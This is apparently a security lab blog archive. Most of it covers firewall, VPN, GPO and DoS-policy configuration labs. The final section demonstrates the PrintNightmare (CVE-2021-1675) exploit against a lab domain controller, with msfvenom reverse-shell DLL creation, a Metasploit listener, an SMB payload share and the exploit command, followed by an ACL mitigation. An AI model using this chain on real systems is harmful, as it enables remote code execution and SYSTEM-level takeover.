Tag Archives: Security

Create an IPSEC site-to-site tunnel between Palo Alto And FortiGate.

This is the lab to use to set up the IPSEC site-to-site tunnel between both devices.

On Palo Alto.

IKE Crypto.

IPSEC Crypto.

IKE Gateway.

IPSec tunnel.

Create a virtual route from PA to Fortinet.

Create two Security Policies to allow traffic from the “Trusted Zone” of PA to the “Trusted Zone” of Fortinet.

Configure Fortinet.

config system interface
edit port1
set mode dhcp
set allowaccess ping httpd http fgfm
next
end
show system interface 
# show system interface to get IP Address from DHCP

Go to Webterm to configure Fortinet.

Configure a custom VPN Tunnel with the following information.

Configure a static route to allow traffic from Trusted Zone (192.168.20.0/24) on Fortinet to the Trusted Zone (192.168.10.0/24) on PA.

Create two Security policies to allow traffic from VPN to Trusted Zone and vice versa.

Ping and traceroute from a VM on Fortinet to another VM on Palo Alto.

Monitor IPSEC tunnel on Fortinet.

Monitor IPSEC tunnel on PA.

Create a VPN IPSEC site to site between Palo Alto and Cisco Router

This is a lab to set up a VPN site-to-site tunnel between both devices.

Configure interfaces and enable IPSEC VPN site to site on Cisco Router.

R1(config)#int g0/0
R1(config-if)#ip add 192.168.20.1 255.255.255.0
R1(config-if)#no shut


R1(config)#int g1/0
R1(config-if)#des "Connect to PA""
R1(config-if)#ip add 10.10.10.1 255.255.255.0
R1(config-if)#no shut

Create an ACL for VPN.
R1(config)#ip access-list extended ACL
R1(config-ext-nacl)#permit ip 192.168.20.0 0.0.0.255 192.168.10.0 0.0.0.255


Create ISAKMP phase 1 of the tunnel.


R1(config)#crypto isakmp policy 1
R1(config-isakmp)#encr aes
R1(config-isakmp)#hash md5
R1(config-isakmp)#authentication pre-share
R1(config-isakmp)#group 5
R1(config-isakmp)#lifetime 86400
# Assign authentication-key for remote peer.
R1(config)#crypto isakmp key cisco123 address 10.10.10.2


# Create IPSEC transfrom set for phase 2
R1(config)#crypto ipsec transform-set TSET esp-aes esp-sha-hmac

# Create cryoto map to apply the phase 2 settings to the interface
crypto map PA1 10 ipsec-isakmp
set peer 10.10.10.2
set transform-set TSET
match address ACL

# Applly crypto map to an interface.

R1(config-crypto-map)#int g1/0
R1(config-if)#crypto map PA1

# Create a static route to route traffic between both sites.
R1(config)#ip route 0.0.0.0 0.0.0.0 10.10.10.2

Access Palo Alto Web management.

Assign an IP address for interface e1/1 and e1/2.

Create a new tunnel 1 on PA.

Configure a static route between PA and Cisco Router and set next hop is “None”.

Configure IKECrypto as on Cisco Router.

Configure IKE Gateway.

Configure IPSEC Tunnel.

Configure Proxy ID.

Create both Security policies to allow traffic from the Trusted zone to the VPN zone and vice versa.

From Webterm2 (192.168.10.2) pings Webterm 3 (192.168.20.2).

Check PA, the IPSEC tunnel is up.

Deploy Ublock Origin Ad blocker via a GPO

According to (https://github.com/gorhill/uBlock), Ublock Origin is an efficient blocker add-on for various browsers. Fast, potent, and lean. uBlock Origin is NOT an “ad blocker”: it is a wide-spectrum blocker — which happens to be able to function as a mere “ad blocker”. The default behavior of uBlock Origin when newly installed is to block ads, trackers, and malware sites.

+ Create a central store for GPO

Copies Chrome, Firefox, MS Edge Policy templates under C:\Windows\SYSVOL\sysvol\cisalab.local\Policies\PolicyDefinitions (copy to C:\Windows\SYSVOL\sysvol rather than \\SERVER\SYSVOL folder)

Google Chrome:

https://support.google.com/chrome/a/answer/187202?hl=en#zippy=%2Cwindows

Firefox:

https://support.mozilla.org/en-US/kb/customizing-firefox-using-group-policy-windows

MS Edge:

https://www.microsoft.com/en-us/edge/business/download

+ Create a new Ublock Origin GPO.

+ Configure UBlock Origin GPO.

Google Chrome. Control which extensions are installed silently – Enabled cjpalhdlnbpafiamejdnhcphjbkeiagm;https://clients2.google.com/service/update2/crx

Firefox:

Extensions to Install – Enabled

https://addons.mozilla.org/firefox/downloads/file/3886236/ublock_origin-1.40.2-an+fx.xpi

MS Edge:

Control which extensions are installed silently – Enabled odfafepnkmbhccpbejgmiehpchacaeak;https://edge.microsoft.com/extensionwebstorebase/v1/crx

+ Link UBlock Origin GPO to Domain computers group.

+ Restart Windows 10 domain-joined client to test.

Ublock Origin has been installed automatically on Windows 10 domain clients.

Configure host-check for SSLVPN connections on FortiGate

This is a diagram to do a host-check SSLVPN connections lab.

Enable tunnel-mode SSLVPN

Enable host-check for Antivirus and Firewall enabled on Fortinet.

Windows machine is up to date and Windows Firewall is enabled.

Setup Forticlient on Windows machine.

Move to unpatched and disabled Windows firewall’s machine.

SSLVPN connection is failed.

Enabled Windows Firewall

Windows OS is not up to date.

Creating an SSLVPN connection again, it was failed.

Checking on Forticlient log and Fortinet Web management console.

Configure DoS Policy on FortiGate

This is a diagram to do a Fortinet Dos Lab.

Fortinet – Policy and Objects – IPv4 DoS Policy.

Change TCP_port_scan setting to 5 and ICMP_flood setting to 4.

Configure quarantine setting on the Fortinet DoS Policy.

config firewall DoS-policy

    edit 1

        set interface “port1”

        set srcaddr “all”

        set dstaddr “all”

        set service “ALL”

        config anomaly

            edit “icmp_flood”

                set status enable

                set log enable

                set quarantine attacker

                set quarantine-expiry 5m 

                set quarantine-log disable

                set threshold 4

            next

        config anomaly

            edit “tcp_port_scan”

                set status enable

                set log enable

                set quarantine attacker

                set quarantine-expiry 5m 

                set quarantine-log disable

                set threshold 5

            next

Sending 5 packets per second, Fortinet starts to block the excessive ICMP packets.

Check Fortinet Anomaly log.

Fortinet Fortiview.

Fortinet Monitor – Banned IP. AT IP Address was blocked by Fortinet Firewall.

Doing port scan on Kali machine by using Nmap command.

Fortinet was blocked port scan on the opened port 80.

Lab Demonstration for Windows Print Spooler 0day Exploit on CVE-2021-1675

References:

https://www.huntress.com/blog/critical-vulnerability-printnightmare-exposes-windows-servers-to-remote-code-execution

The exploit code

https://github.com/cube0x0/CVE-2021-1675/blob/main/CVE-2021-1675.py

Step1: Setup the Lab

1 DC1 (dc1.cisalab.local) is running Windows 2016 with IP address is 10.0.0.77

Print Spooler service is running on the DC.

1 Kali Linux (AT) with IP address is 10.0.0.191.

Step 2: How to set up Kali

Upgrade Python

sudo apt-get update

sudo apt-get upgrade

sudo apt-get install python3-venv

1. The best practice is to create Python virtual Environment

python3 -m venv PrintNightmare

source PrintNightmare/bin/activate

2. clone the repo and install the custom Impacket version:

git clone https://github.com/cube0x0/CVE-2021-1675.git

git clone https://github.com/cube0x0/impacket

cd impacket

python3 ./setup.py install

3. Set up SMB share

(Use this method to allow the Windows servers to download the malicious codes on AT machine)

copy the original smb.conf file and create a backup file

cp /etc/samba/smb.conf /etc/samba/smb.conf.bak

now on the smb.conf change to this new configuration File

[global]

map to guest = Bad User

server role = standalone server

usershare allow guests = yes

idmap config * : backend = tdb

smb ports = 445 [smb]

comment = Samba

path = /tmp/

guest ok = yes

read only = no

browsable = yes

force user = nobody

Spin up SMB share: impacket-smbserver smb /tmp/

In case you have some problems with the SMB try to use build-in SMBD service

service smbd start

service smbd restart

4. Payload Creation:

Create Reverse shell Payload as a DLL 

msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=<YOUR AT IP> LPORT=<PORT TO LISTEN> -f dll -o /tmp/rev.dll

AT creates a reverse shell connection with IP address is 10.0.0.191 (AT) and the destination port is 443. The shell code will be dropped on the Windows servers on /tmp/reverse.dll 

msfvenom -f dll -p windows/x64/shell_reverse_tcp LHOST=10.0.0.191 LPORT=443 -o /tmp/reverse.dll

5. Set up a listener Use Metasploit tool to create a revere shell session (a listener)

msfconsole

use multi/handler

set PAYLOAD windows/x64/shell_reverse_tcp

set LHOST 10.0.0.191

set LPORT 443 run

6. Windows Environment:

you need to create a dc with an active directory (cisalab.local) create a low privilege user (test/123456)

7. Download and run shellcode

python3 CVE-2021-1675.py tle:123456@10.0.0.77 ‘\\10.0.0.191\smb\reverse.dll’

AT will create a connection to Windows server (DC1 – 10.0.0.77) with username/password is tle/123456.

Then the malicious code will be downloaded and run from the AT machine (\\10.0.0.191\smb\reverse.dll). After that, if the shellcode works then a reverse shell connection from Windows server to AT machine.

Step 3. Live Demonstration

The shell code is running on the AT machine

python3 CVE-2021-1675.py cisalab.local/tle:123456@10.0.0.77 '\\10.0.0.191\smb\reverse.dll'

The malicious code is downloaded but it is blocked by Windows Defender on Windows servers

So, the shellcode cannot run on the Windows servers with Windows Defenders which is running.

If Windows Defender is disabled.

Run the exploit code again.

We can see a reverse shell connection has been established on the Windows server (DC) and AT machine. The connection seems to be an HTTPS connection, so it is hard to detect because of encryption.

The AT has a cmd shell with SYSTEM permission on the victim machine. That means the AT can do everything on it. Checking on Windows server (DC1), trojan code has been created on DC1 under x64 directory on “C:\Windows\System32\spool\drivers\”.

The shell code (reverse.dll) is successfully dropped on the folder named “3”. It may be a name when AT has created a reverse shell session.

Step 4: PREVENTION when the print spooler service is still running

Using PowerShell to create a ACL to prevent the malicious code to drop on the “C:\Windows\System32\spool\drivers\”

https://blog.truesec.com/2021/06/30/fix-for-printnightmare-cve-2021-1675-exploit-to-keep-your-print-servers-running-while-a-patch-is-not-available/

Before applying the ACL.

After implementing the ACL.

By restricting the ACLs on this directory (and subdirectories) we can prevent malicious DLLs to be introduced by the print spooler service. The exploit works by dropping a DLL in a subdirectory under C:\Windows\System32\spool\drivers.

Run the exploit code again.

The trojan code cannot put its files on the directory (“RPRN SessionError: code: 0x3 – ERROR_PATH_NOT_FOUND – The system cannot find the path specified.”).

There is no trojan code has put on the directory.